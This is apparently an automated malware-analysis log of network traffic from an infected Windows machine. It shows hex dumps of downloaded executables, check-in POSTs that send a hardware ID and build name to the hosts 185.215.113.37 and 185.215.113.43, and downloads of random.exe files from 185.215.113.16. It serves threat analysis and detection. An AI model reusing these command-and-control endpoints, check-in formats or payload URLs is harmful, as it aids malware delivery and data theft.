Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:02:42 GMTContent-Type: application/octet-streamContent-Length: 1895936Last-Modified: Thu, 24 Oct 2024 01:49:23 GMTConnection: keep-aliveETag: "6719a7a3-1cee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 f0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4b 00 00 04 00 00 86 d7 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 d2 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 d1 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 72 6f 70 67 66 73 73 00 e0 19 00 00 00 31 00 00 d4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 6d 75 74 77 74 7a 68 00 10 00 00 00 e0 4a 00 00 04 00 00 00 c8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4a 00 00 22 00 00 00 cc 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:02:47 GMTContent-Type: application/octet-streamContent-Length: 1918464Last-Modified: Thu, 24 Oct 2024 01:49:16 GMTConnection: keep-aliveETag: "6719a79c-1d4600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 90 6c 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 6c 00 00 04 00 00 72 5c 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2b 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 7a 78 6b 76 69 6d 72 00 f0 1a 00 00 90 51 00 00 e4 1a 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 62 75 6f 6b 79 74 75 00 10 00 00 00 80 6c 00 00 04 00 00 00 20 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 6c 00 00 22 00 00 00 24 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:02:50 GMTContent-Type: application/octet-streamContent-Length: 2742272Last-Modified: Thu, 24 Oct 2024 01:44:44 GMTConnection: keep-aliveETag: "6719a68c-29d800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2a 00 00 04 00 00 25 5a 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 76 78 69 6a 65 73 76 6f 00 80 29 00 00 a0 00 00 00 78 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6f 61 6d 79 79 68 71 00 20 00 00 00 20 2a 00 00 04 00 00 00 b2 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2a 00 00 22 00 00 00 b6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:03:13 GMTContent-Type: application/octet-streamContent-Length: 1895936Last-Modified: Thu, 24 Oct 2024 01:49:23 GMTConnection: keep-aliveETag: "6719a7a3-1cee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 f0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4b 00 00 04 00 00 86 d7 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 d2 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 d1 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 72 6f 70 67 66 73 73 00 e0 19 00 00 00 31 00 00 d4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 6d 75 74 77 74 7a 68 00 10 00 00 00 e0 4a 00 00 04 00 00 00 c8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4a 00 00 22 00 00 00 cc 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:03:19 GMTContent-Type: application/octet-streamContent-Length: 1918464Last-Modified: Thu, 24 Oct 2024 01:49:16 GMTConnection: keep-aliveETag: "6719a79c-1d4600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 90 6c 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 6c 00 00 04 00 00 72 5c 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2b 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 7a 78 6b 76 69 6d 72 00 f0 1a 00 00 90 51 00 00 e4 1a 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 62 75 6f 6b 79 74 75 00 10 00 00 00 80 6c 00 00 04 00 00 00 20 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 6c 00 00 22 00 00 00 24 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:03:21 GMTContent-Type: application/octet-streamContent-Length: 2742272Last-Modified: Thu, 24 Oct 2024 01:44:44 GMTConnection: keep-aliveETag: "6719a68c-29d800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2a 00 00 04 00 00 25 5a 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 76 78 69 6a 65 73 76 6f 00 80 29 00 00 a0 00 00 00 78 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6f 61 6d 79 79 68 71 00 20 00 00 00 20 2a 00 00 04 00 00 00 b2 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2a 00 00 22 00 00 00 b6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJECBKKECFIEBGCAKJKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 37 42 32 36 39 44 32 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------HJJECBKKECFIEBGCAKJKContent-Disposition: form-data; name="hwid"B97B269D2A6E2371543510------HJJECBKKECFIEBGCAKJKContent-Disposition: form-data; name="build"doma------HJJECBKKECFIEBGCAKJK--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 34 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A74B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 30 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001090001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 30 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001091001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
